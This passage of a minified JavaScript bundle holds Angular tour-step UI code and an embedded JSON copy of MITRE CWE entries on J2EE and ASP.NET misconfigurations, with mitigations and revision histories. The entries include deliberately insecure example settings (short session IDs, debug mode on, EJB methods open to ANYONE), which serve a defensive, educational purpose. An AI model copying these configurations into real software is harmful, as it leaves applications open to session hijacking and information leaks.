0:n.yPosition)||"below",c.hasBackdrop=!!e.closeOnOutsideClick,this.opener.markForCheck(),r.openMenu(),this.menuCloseSubscription&&this.menuCloseSubscription.unsubscribe(),this.menuCloseSubscription=r.menuClosed.pipe(xd()).subscribe(()=>{this.tourService.getStatus()!==Yl.OFF&&this.tourService.end()})}hideTourStep(){this.isActive=!1,this.menuCloseSubscription&&this.menuCloseSubscription.unsubscribe(),this.opener.trigger.closeMenu()}getIsScrollingEnabled(){return!this.tourService.currentStep.disablePageScrolling}}return t.\u0275fac=function(e){return new(e||t)(Ee(Ko),Ee(fo),Ee(mi),Ee(Gb),Ee(o5))},t.\u0275dir=Ot({type:t,selectors:[["","tourAnchor",""]],hostVars:2,hostBindings:function(e,i){2&e&&Ct("touranchor--is-active",i.isActive)},inputs:{tourAnchor:"tourAnchor"}}),t})(),Mxe=(()=>{class t extends hxe{constructor(e,i){super(i),this.tourStepTemplateService=e,this.tourService=i,this.step={}}ngAfterViewInit(){this.tourStepTemplateService.templateComponent=this}}return t.\u0275fac=function(e){return new(e||t)(Ee(o5),Ee(Gb))},t.\u0275cmp=Wt({type:t,selectors:[["tour-step-template"]],contentQueries:function(e,i,n){if(1&e&&fa(n,ho,5),2&e){let r;Vt(r=Bt())&&(i.stepTemplateContent=r.first)}},viewQuery:function(e,i){if(1&e&&Mi(Xo,5),2&e){let n;Vt(n=Bt())&&(i.tourStep=n.first)}},inputs:{stepTemplate:"stepTemplate"},features:[ci],decls:4,vars:5,consts:[[1,"tour-step",3,"overlapTrigger"],[4,"ngTemplateOutlet","ngTemplateOutletContext"],["defaultTemplate",""],[3,"click"],[1,"title-text"],["mat-button","","mat-icon-button","",1,"close",3,"click"],[3,"innerHTML"],["align","end"],["mat-button","",1,"prev",3,"disabled","click"],["mat-button","","class","next",3,"click",4,"ngIf"],["mat-button","",3,"click",4,"ngIf"],["mat-button","",1,"next",3,"click"],["mat-button","",3,"click"]],template:function(e,i){if(1&e&&(m(0,"mat-menu",0),ne(1,fxe,1,0,"ng-container",1),u(),ne(2,gxe,15,6,"ng-template",null,2,d1)),2&e){const n=Ti(3);V("overlapTrigger",!1),C(1),V("ngTemplateOutlet",i.stepTemplate||i.stepTemplateContent||n)("ngTemplateOutletContext",fr(3,Cxe,i.step))}},dependencies:[Ri,_1,Xo,qF,HF,UF,K0e,da,oa],styles:[".tour-step .mat-menu-content{padding:0!important}mat-card[_ngcontent-%COMP%]{min-width:200px}mat-card-actions[_ngcontent-%COMP%]{justify-content:space-between}mat-card-actions[_ngcontent-%COMP%]   button[_ngcontent-%COMP%]{margin:0}mat-card-actions[_ngcontent-%COMP%]   button.prev[_ngcontent-%COMP%]{padding-left:4px}mat-card-actions[_ngcontent-%COMP%]   button.next[_ngcontent-%COMP%]{padding-right:4px}mat-card-title[_ngcontent-%COMP%]{display:flex;align-items:center;justify-content:space-between}mat-card-title[_ngcontent-%COMP%]   .title-text[_ngcontent-%COMP%]{line-height:24px;font-size:22px;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}mat-card-title[_ngcontent-%COMP%]   button.close[_ngcontent-%COMP%]{margin:-8px -8px -8px 0}"]}),t})(),Gq=(()=>{class t{static forRoot(){return{ngModule:t,providers:[o5,n5,dT,Gb]}}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[rn,Uq,o8,aA,up,ib,Uq]}),t})();const Op=JSON.parse('{"5":{"attr":{"@_ID":"5","@_Name":"J2EE Misconfiguration: Data Transmission Without Encryption","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"Information sent over a network can be compromised while in transit. An attacker may be able to read or modify the contents if the data are sent in plaintext or are weakly encrypted.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"319","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Application Data"},{"Scope":"Integrity","Impact":"Modify Application Data"}]},"Potential_Mitigations":{"Mitigation":{"Phase":"System Configuration","Description":"The application configuration should ensure that SSL or an encryption mechanism of equivalent strength and vetted reputation is used for all access-controlled pages."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"J2EE Misconfiguration: Insecure Transport"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Notes":{"Note":{"attr":{"@_Type":"Other"},"xhtml:p":"If an application uses SSL to guarantee confidential communication with client browsers, the application configuration should make it impossible to view any access controlled page without SSL. There are three common ways for SSL to be bypassed:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["A user manually enters URL and types \\"HTTP\\" rather than \\"HTTPS\\".","Attackers intentionally send a user to an insecure URL.","A programmer erroneously creates a relative link to a page in the application, which does not switch from HTTP to HTTPS. (This is particularly easy to do when the link moves between public and secured areas on a web site.)"]}}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Common_Consequences, Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}],"Previous_Entry_Name":{"#text":"J2EE Misconfiguration: Insecure Transport","attr":{"@_Date":"2008-04-11"}}}},"6":{"attr":{"@_ID":"6","@_Name":"J2EE Misconfiguration: Insufficient Session-ID Length","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The J2EE application is configured to use an insufficient session ID length.","Extended_Description":"If an attacker can guess or steal a session ID, then they may be able to take over the user\'s session (called session hijacking). The number of possible session IDs increases with increased session ID length, making it more difficult to guess or steal a session ID.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"334","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":{"xhtml:p":["Session ID\'s can be used to identify communicating parties in a web environment.","The expected number of seconds required to guess a valid session identifier is given by the equation: (2^B+1)/(2*A*S) Where: - B is the number of bits of entropy in the session identifier. - A is the number of guesses an attacker can try each second. - S is the number of valid session identifiers that are valid and available to be guessed at any given time. The number of bits of entropy in the session identifier is always less than the total number of bits in the session identifier. For example, if session identifiers were provided in ascending order, there would be close to zero bits of entropy in the session identifier no matter the identifier\'s length. Assuming that the session identifiers are being generated using a good source of random numbers, we will estimate the number of bits of entropy in a session identifier to be half the total number of bits in the session identifier. For realistic identifier lengths this is possible, though perhaps optimistic."]}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"If an attacker can guess an authenticated user\'s session identifier, they can take over the user\'s session."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Session identifiers should be at least 128 bits long to prevent brute-force session guessing. A shorter session identifier leaves the application open to brute-force session guessing attacks."},{"Phase":"Implementation","Description":"A lower bound on the number of valid session identifiers that are available to be guessed is the number of users that are active on a site at any given moment. However, any users that abandon their sessions without logging out will increase this number. (This is one of many good reasons to have a short inactive session timeout.) With a 64 bit session identifier, assume 32 bits of entropy. For a large web site, assume that the attacker can try 1,000 guesses per second and that there are 10,000 valid session identifiers at any given moment. Given these assumptions, the expected time for an attacker to successfully guess a valid session identifier is less than 4 minutes. Now assume a 128 bit session identifier that provides 64 bits of entropy. With a very large web site, an attacker might try 10,000 guesses per second with 100,000 valid session identifiers available to be guessed. Given these assumptions, the expected time for an attacker to successfully guess a valid session identifier is greater than 292 years."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-47"},"Intro_Text":"The following XML example code is a deployment descriptor for a Java web application deployed on a Sun Java Application Server. This deployment descriptor includes a session configuration property for configuring the session ID length.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"XML"},"xhtml:div":{"#text":"&lt;sun-web-app&gt;&lt;/sun-web-app&gt;","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...&lt;session-config&gt;&lt;/session-config&gt;...","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"&lt;session-properties&gt;&lt;/session-properties&gt;","xhtml:div":{"#text":"&lt;property name=\\"idLengthBytes\\" value=\\"8\\"&gt;&lt;/property&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"&lt;description&gt;The number of bytes in this web module\'s session ID.&lt;/description&gt;","attr":{"@_style":"margin-left:10px;"}}}}}}}}},"Body_Text":["This deployment descriptor has set the session ID length for this Java web application to 8 bytes (or 64 bits). The session ID length for Java web applications should be set to 16 bytes (128 bits) to prevent attackers from guessing and/or stealing a session ID and taking over a user\'s session.","Note for most application servers including the Sun Java Application Server the session ID length is by default set to 128 bits and should not be changed. And for many application servers the session ID length cannot be changed from this default setting. Check your application server documentation for the session ID length default setting and configuration options to ensure that the session ID length is set to 128 bits."]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"J2EE Misconfiguration: Insufficient Session-ID Length"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"21"}},{"attr":{"@_CAPEC_ID":"59"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-482"}}]},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Background_Details, Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Other_Notes, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Background_Details, Common_Consequences, Enabling_Factors_for_Exploitation, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Description, Enabling_Factors_for_Exploitation, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}]}},"7":{"attr":{"@_ID":"7","@_Name":"J2EE Misconfiguration: Missing Custom Error Page","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The default error page of a web application should not display sensitive information about the software system.","Extended_Description":{"xhtml:p":["A Web application must define a default error page for 4xx errors (e.g. 404), 5xx (e.g. 500) errors and catch java.lang.Throwable exceptions to prevent attackers from mining information from the application container\'s built-in error response.","When an attacker explores a web site looking for vulnerabilities, the amount of information that the site provides is crucial to the eventual success or failure of any attempted attacks."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"756","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"A stack trace might show the attacker a malformed SQL query string, the type of database being used, and the version of the application container. This information enables the attacker to target known vulnerabilities in these components."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Handle exceptions appropriately in source code."},{"Phase":["Implementation","System Configuration"],"Description":"Always define appropriate error pages. The application configuration should specify a default error page in order to guarantee that the application will never leak error messages to an attacker. Handling standard HTTP error codes is useful and user-friendly in addition to being a good security practice, and a good configuration will also define a last-chance error handler that catches any exception that could possibly be thrown by the application."},{"Phase":"Implementation","Description":"Do not attempt to process an error or attempt to mask it."},{"Phase":"Implementation","Description":"Verify return values are correct and do not supply sensitive information about the system."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-76"},"Intro_Text":"In the snippet below, an unchecked runtime exception thrown from within the try block may cause the container to display its default error page (which may contain a full stack trace, among other things).","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"Public void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {}","xhtml:div":{"#text":"try {} catch (ApplicationSpecificException ase) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"...","attr":{"@_style":"margin-left:10px;"}},{"#text":"logger.error(\\"Caught: \\" + ase.toString());","attr":{"@_style":"margin-left:10px;"}}]}}}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"J2EE Misconfiguration: Missing Error Handling"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-65"}}]},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Common_Consequences, Description, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}],"Previous_Entry_Name":{"#text":"J2EE Misconfiguration: Missing Error Handling","attr":{"@_Date":"2009-03-10"}}}},"8":{"attr":{"@_ID":"8","@_Name":"J2EE Misconfiguration: Entity Bean Declared Remote","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"When an application exposes a remote interface for an entity bean, it might also expose methods that get or set the bean\'s data. These methods could be leveraged to read sensitive information, or to change data in ways that violate the application\'s expectations, potentially leading to other vulnerabilities.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Application Data","Modify Application Data"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Declare Java beans \\"local\\" when possible. When a bean must be remotely accessible, make sure that sensitive information is not exposed, and ensure that the application logic performs appropriate validation of any data that might be modified by an attacker."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following example demonstrates the weakness.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"XML"},"xhtml:div":{"#text":"&lt;ejb-jar&gt;&lt;/ejb-jar&gt;","xhtml:div":{"#text":"&lt;enterprise-beans&gt;&lt;/enterprise-beans&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"&lt;entity&gt;&lt;/entity&gt;...","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"&lt;ejb-name&gt;EmployeeRecord&lt;/ejb-name&gt;&lt;home&gt;com.wombat.empl.EmployeeRecordHome&lt;/home&gt;&lt;remote&gt;com.wombat.empl.EmployeeRecord&lt;/remote&gt;...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""]},"xhtml:br":""}}}}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"J2EE Misconfiguration: Unsafe Bean Declaration"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Notes":{"Note":{"#text":"Entity beans that expose a remote interface become part of an application\'s attack surface. For performance reasons, an application should rarely use remote entity beans, so there is a good chance that a remote entity bean declaration is an error.","attr":{"@_Type":"Other"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}]}},"9":{"attr":{"@_ID":"9","@_Name":"J2EE Misconfiguration: Weak Access Permissions for EJB Methods","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"If elevated access rights are assigned to EJB methods, then an attacker can take advantage of the permissions to exploit the software system.","Extended_Description":"If the EJB deployment descriptor contains one or more method permissions that grant access to the special ANYONE role, it indicates that access control for the application has not been fully thought through or that the application is structured in such a way that reasonable access control restrictions are impossible.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"266","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Other"}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","System Configuration"],"Description":"Follow the principle of least privilege when assigning access rights to EJB methods. Permission to invoke EJB methods should not be granted to the ANYONE role."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following deployment descriptor grants ANYONE permission to invoke the Employee EJB\'s method named getSalary().","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"XML"},"xhtml:div":{"#text":"&lt;ejb-jar&gt;&lt;/ejb-jar&gt;","xhtml:div":{"#text":"...&lt;assembly-descriptor&gt;&lt;/assembly-descriptor&gt;...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""],"xhtml:div":{"#text":"&lt;method-permission&gt;&lt;/method-permission&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"&lt;role-name&gt;ANYONE&lt;/role-name&gt;&lt;method&gt;&lt;ejb-name&gt;Employee&lt;/ejb-name&gt;&lt;method-name&gt;getSalary&lt;/method-name&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""]}}}}}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"J2EE Misconfiguration: Weak Access Permissions"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}],"Previous_Entry_Name":{"#text":"J2EE Misconfiguration: Weak Access Permissions","attr":{"@_Date":"2008-04-11"}}}},"11":{"attr":{"@_ID":"11","@_Name":"ASP.NET Misconfiguration: Creating Debug Binary","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"Debugging messages help attackers learn about the system and plan a form of attack.","Extended_Description":"ASP .NET applications can be configured to produce debug binaries. These binaries give detailed debugging messages and should not be used in production environments. Debug binaries are meant to be used in a development or testing environment and can pose a security risk if they are deployed to production.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"489","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"ASP.NET","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":"The debug attribute of the &lt;compilation&gt; tag defines whether compiled binaries should include debugging information. The use of debug binaries causes an application to provide as much information about itself as possible to the user."},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Build and Compilation"}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"Attackers can leverage the additional information they gain from debugging output to mount attacks targeted on the framework, database, or other resources used by the application."}},"Potential_Mitigations":{"Mitigation":{"Phase":"System Configuration","Description":"Avoid releasing debug binaries into the production environment. Change the debug mode to false when the application is deployed into production."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The file web.config contains the debug mode setting. Setting debug to \\"true\\" will let the browser display debugging information.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"XML"},"xhtml:div":{"#text":"&lt;?xml version=\\"1.0\\" encoding=\\"utf-8\\" ?&gt;&lt;configuration&gt;&lt;/configuration&gt;","xhtml:br":"","xhtml:div":{"#text":"&lt;system.web&gt;&lt;/system.web&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"&lt;compilationdefaultLanguage=\\"c#\\"debug=\\"true\\"/&gt;...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""]}}}},"Body_Text":"Change the debug mode to false when the application is deployed into production."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"ASP.NET Misconfiguration: Creating Debug Binary"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Demonstrative_Example, Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Background_Details, Common_Consequences, Demonstrative_Examples, Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships, Time_of_Introduction"}]}},"12":{"attr":{"@_ID":"12","@_Name":"ASP.NET Misconfiguration: Missing Custom Error Page","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"An ASP .NET application must enable custom error pages in order to prevent attackers from mining information from the framework\'s built-in responses.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"756","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"ASP.NET","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":"The mode attribute of the &lt;customErrors&gt; tag defines whether custom or default error pages are used."},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"Default error pages gives detailed information about the error that occurred, and should not be used in production environments. Attackers can leverage the additional information provided by a 